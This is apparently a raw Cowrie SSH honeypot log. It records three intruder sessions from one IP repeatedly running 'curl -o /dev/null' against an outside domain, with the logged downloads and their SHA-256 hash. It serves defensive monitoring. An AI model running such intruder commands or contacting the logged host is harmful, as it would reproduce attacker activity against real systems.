{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.246087Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.247453Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.248426Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.251323Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.279045Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.279717Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.285009Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.286752Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.289472Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.290582Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.291363Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.292316Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.292712Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.317753Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.318429Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.323089Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.324925Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.329104Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.329840Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.333615Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.352243Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.352926Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.357781Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.358365Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.361058Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.364672Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.384039Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.385215Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.385671Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.391065Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.393071Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.393582Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.396363Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.397555Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.398220Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.453161Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.453733Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.456425Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.456954Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.461389Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.464005Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.467482Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.468009Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.494943Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.495618Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.497814Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.498394Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.503206Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.505908Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.506959Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.507534Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.536296Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.538392Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.539022Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.541244Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.541791Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.544628Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.545343Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.548396Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.550509Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.578486Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.581085Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.581838Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.584185Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.584900Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.586489Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.586984Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.590176Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.593359Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.620627Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.621968Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.622709Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.625184Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.626437Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.628124Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.628993Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.632117Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.635732Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.663476Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
